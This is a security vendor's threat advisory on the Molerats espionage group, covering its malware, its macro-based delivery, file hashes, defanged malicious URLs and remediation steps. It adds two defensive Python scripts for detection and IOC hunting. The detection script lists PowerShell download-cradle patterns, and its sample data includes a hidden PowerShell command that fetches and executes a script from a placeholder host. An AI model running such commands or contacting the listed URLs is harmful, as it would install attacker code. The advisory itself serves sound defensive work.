• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Press Release
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact

Rewterz Threat Alert – Molerats APT – Active IOCs

January 25, 2022

Severity

High

Analysis Summary

Molerats APT, also known as Moonlight, Extreme Jackal, and Gaza Hackers Team, has been active since 2012. The group made headlines that year with a cyberattack against the Israeli government, and its targeting has since expanded to Palestine, the U.S., and the UK. Molerats is a politically motivated nation-state actor that conducts cyber espionage using three malware variants:

  1. SharpStage backdoor
  2. DropBook backdoor
  3. MoleNet downloader

Molerats uses Dropbox, Google Drive, and other legitimate services to deliver its spyware, so the payload downloads blend in with ordinary cloud traffic, in cyber-espionage campaigns against targets in the Middle East.

[Figure: Molerats attack chain]

The lures are Arabic-language documents about the Palestinian conflict with Israel. Each document carries a macro that, once enabled, runs a PowerShell command to fetch the malware.
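The macro-to-PowerShell step above is the point in this chain most environments can catch with process-creation telemetry alone: an Office process should not be spawning a script host, and the PowerShell it launches usually carries a download cradle. The following is an added detection example, not Rewterz's or Molerats' code; the event records are constructed in the shape of Sysmon Event ID 1 data, and the field names (ParentImage, Image, CommandLine) are an assumption to be mapped onto your own EDR or SIEM schema.

```python
"""Flag Office-spawned script hosts and PowerShell download cradles.

Added example, not from the advisory. The sample events are constructed and
the Sysmon-style field names are an assumption.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle and evasion patterns commonly seen in macro-launched PowerShell.
CRADLE_PATTERNS = [
    re.compile(p, re.IGNORECASE) for p in (
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
        r"\biex\b|invoke-expression",
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",   # -enc <base64 blob>
        r"-w(indowstyle)?\s+hidden",
        r"frombase64string",
    )
]


def image_name(path):
    """Basename of a Windows or POSIX path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons this process-creation event is suspicious (empty list = benign)."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmdline)]
        if hits:
            reasons.append("powershell_download_cradle:" + "|".join(hits))
    return reasons


def find_suspicious(events):
    """[(EventId, reasons)] for every event that trips at least one rule."""
    out = []
    for e in events:
        reasons = classify(e)
        if reasons:
            out.append((e["EventId"], reasons))
    return out


# Constructed sample telemetry (not real events from the advisory).
SAMPLE_EVENTS = [
    {"EventId": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x.ps1')\""},
    {"EventId": 2,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"EventId": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
    {"EventId": 4,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS):
        print(event_id, reasons)
```

The parent/child rule fires on its own, without a command line, because macro droppers often pass an obfuscated command that no pattern list will keep up with; the cradle patterns are there to raise the confidence of the alert and to catch PowerShell launched via an intermediate cmd.exe, where the Office parent is one hop further up.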

Impact

  • Data Exfiltration
  • Cyber Espionage
  • Political and Economic Loss

Indicators of Compromise

MD5

  • 4c61985a5c8c11eb516e592397343f27
  • b0f7e462dde681004f5b2b1eca1f38e0
  • 79c25e297870ce68907f2c25564a161f
  • 1b1ec8ae327a5543423978e7e58fc44c
  • 5f70d52d2be4d0389eeb1c7e27d5e9bd
  • a559547c0815d1a4c025d6de25108a70
  • 3158e619788d56669175490817863fb1
  • eea1c70128060e6246bc959a873be7da
  • 60e9b1c155263385f51b80345c292269
  • f4d70ad2e247123db47bb6bfcddf6333
  • 8f201c59e28bb3fb6c09f5c424972988
  • 2ca3f1b013c26f9147547c6d67d02a8c
  • ae3d8576594867cfd55bac9fe12d6a54
  • af44e1c376503429bef73e668e56ab7a
  • 380962723eae3e610e957c075b884dd5

SHA-256

  • 553127cb586591cbfbae54dd4e28d4cd40fdddebaf4e0e7e1f3f23c446a621bb
  • 58f926d9bd70c144f8697905bf81dfff046a12929639dfba3a6bd30a26367823
  • 782681add2e26a17f4ad415b5b30f280c93f954a40ec4f00e0e60f9ef3884ac9
  • 688f79ba03554bbaf2be513416360ce44757b2f69103e6043ab66508611fe01a
  • 69af17199ede144d1c743146d4a7b7709b765e57375d4a4200ea742dabef75ef
  • caab3635c747d037eff7d8597698636c9a597ff631840e551011011bd4608245
  • 2578cbf4980569b372e06cf414c3da9e29226df4612e2fc6c56793f77f8429d8
  • 54eadcd0b93f0708c8621d2d8d1fb4016f617680b3b0496343a9b3fed429aaf9
  • 6afa011e2da6b009ab8e10a59c55c0f0c2161ca19f6305002f95dd532cf594bf
  • 5b0693731f100b960720d67bda6f3e6df1c25b7d5024d11cf61c13e7492f18cf
  • 5b186548de81bc1d1ce92c042a6c488a647d80e570dd58c8d3f34910c12aba87
  • f5894e8c68aa2d3e34f7c967e6c4ad3cf35b399d452826148c2dd99958fa2af4
  • 4e2bede5a455218844d18ff7086d9d35714499afb4d8d2c609274e1a05c67339
  • 49eb73f776e4e6d87d9701a135769c843847e7af6f5372fa99aba97b8c6af639
  • f323a150d7597f46d29eb3a3c56f74e11d18caf164f9176c8c1b2fa0031cc729

SHA-1

  • 0a2b7ac50f1467588b0e0b1b73fdfd270eaf86a0
  • 7f0e609cd49a51b1e0fcc08499a618136451f689
  • 0eb6fd1bbc58fff0d85fe01e6528939650f8965c
  • d59fccb2cfb79cf26b332e40b102aa35d67b44ff
  • 7f3d04f54ffff9751d037398752107856f563e73
  • 8ec4d30a3040e260174cabb4b0c3959233b53929
  • 2da78a9a8b3005fcf64028b035ab6f1a26ac290c
  • c3be6ad66b8de00741901ea9556621ef3515ee85
  • 810ad432a3cec7b6ffca3268685d21f11b1b1688
  • 11c38b5c1bef14939410ebddcfec9c8a5e0e6aae
  • 549d6a3123ea553d2bec5ef01029cd48fc50e0db
  • dde1e4ed199cca865a43f400646157cf3f42dd05
  • 52693b5624d8ec23a5884653eecdf44502292109
  • 8b74574582a0adceb8b218399877c3f57daae57f
  • d30810bdd1fe0e771c810659cabdb024985c4e7f

URL

  • https[:]//doc-0s-acdocs[.]googleusercontent[.]com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9bqijre42671eatme7gki86fteputh9h/1607592975000/05594231565667585421/*/1NnMlUPwkxK4_wAJwrqxqBAfdKCPDxyeh?e=download
  • https[:]//www[.]artlifelondon[.]com/beta/medias[.]php
  • http[:]//artlifelondon[.]com/hamas_internal_elections[.]rar
  • https[:]//yourbusiness[.]azcentral[.]com/plan-seminar-workshop-14583[.]html
  • https[:]//www[.]forextradingtipsblog[.]com/beta/mediasG[.]php?NamePC=&NameUser=&Mask=0
  • https[:]//forextradingtipsblog[.]com/SaudiRecognitionofIsrael[.]php
  • https[:]//app[.]simplenote[.]com/p/04T5bp
  • https[:]//exchangeupdates[.]com/enterprise/Wenterprise[.]php

Remediation

  • Block the threat indicators at their respective controls: the file hashes on endpoint protection, the URLs and their domains on the web proxy, DNS filtering and perimeter firewall.
  • Search for the IOCs in your environment: the hashes against files on endpoints, and the URLs and domains against proxy and DNS logs.
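Hunting for the indicators above comes down to two matches: file hashes against what is on disk, and the URL hosts against proxy or DNS logs. The script below is an added example, not a Rewterz tool; it copies a handful of the published hashes and URLs verbatim (extend the sets from the full lists above), refangs the `[.]`/`[:]` notation for matching, and runs over a constructed proxy log whose three-field-plus-URL layout is an assumption about your own log format.

```python
"""Hunt for the advisory's file hashes and URL hosts.

Added example, not Rewterz tooling. IOC values are copied from the advisory;
the proxy log lines are constructed and their layout is an assumption.
"""
import hashlib
import os
import re
from urllib.parse import urlsplit

# Subset of the published indicators, as defanged on the page.
IOC_HASHES = {
    "4c61985a5c8c11eb516e592397343f27",                                  # MD5
    "0a2b7ac50f1467588b0e0b1b73fdfd270eaf86a0",                          # SHA-1
    "553127cb586591cbfbae54dd4e28d4cd40fdddebaf4e0e7e1f3f23c446a621bb",  # SHA-256
}
IOC_URLS_DEFANGED = [
    "https[:]//www[.]artlifelondon[.]com/beta/medias[.]php",
    "http[:]//artlifelondon[.]com/hamas_internal_elections[.]rar",
    "https[:]//forextradingtipsblog[.]com/SaudiRecognitionofIsrael[.]php",
    "https[:]//exchangeupdates[.]com/enterprise/Wenterprise[.]php",
]


def refang(ioc):
    """Turn a defanged indicator ([.] / [:] / hxxp) back into the real string."""
    plain = ioc.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", plain, flags=re.IGNORECASE)


def ioc_hosts(defanged_urls):
    """Hostnames from the URL list; matching on host also catches path variants."""
    return {urlsplit(refang(u)).hostname.lower() for u in defanged_urls}


def file_hashes(path):
    """MD5, SHA-1 and SHA-256 of a file in one pass, as a set of hex digests."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for h in (md5, sha1, sha256):
                h.update(chunk)
    return {md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()}


def scan_tree(root, ioc_hashes=IOC_HASHES):
    """[(path, matched_hash)] for every file under root whose hash is an IOC."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                common = file_hashes(path) & ioc_hashes
            except OSError:       # unreadable or vanished file: skip, keep hunting
                continue
            for h in sorted(common):
                hits.append((path, h))
    return hits


def scan_proxy_log(lines, hosts):
    """[(line_no, host)] for log lines whose requested URL host is an IOC host."""
    hits = []
    for n, line in enumerate(lines, 1):
        for tok in line.split():
            if "://" not in tok:
                continue
            host = urlsplit(tok).hostname
            if host and host.lower() in hosts:
                hits.append((n, host.lower()))
    return hits


# Constructed proxy log (not real traffic): timestamp client method url status.
SAMPLE_LOG = [
    "2022-01-25T09:12:03Z 10.0.4.21 GET https://www.artlifelondon.com/beta/medias.php 200",
    "2022-01-25T09:12:09Z 10.0.4.21 GET https://www.microsoft.com/ 200",
    "2022-01-25T09:13:44Z 10.0.7.8 GET http://artlifelondon.com/hamas_internal_elections.rar 200",
    "2022-01-25T09:15:01Z 10.0.2.2 GET https://notartlifelondon.com/x 200",
]

if __name__ == "__main__":
    print(scan_proxy_log(SAMPLE_LOG, ioc_hosts(IOC_URLS_DEFANGED)))
    print(scan_tree(".", IOC_HASHES))
```

Host matching is exact, so `notartlifelondon.com` does not trip on `artlifelondon.com`; if your logs record only the registered domain, add a comparison on the parent domain as well. The Google Drive and Simplenote URLs in the list are shared infrastructure, so match those on the full path rather than the host, or every legitimate Drive download will light up.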
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.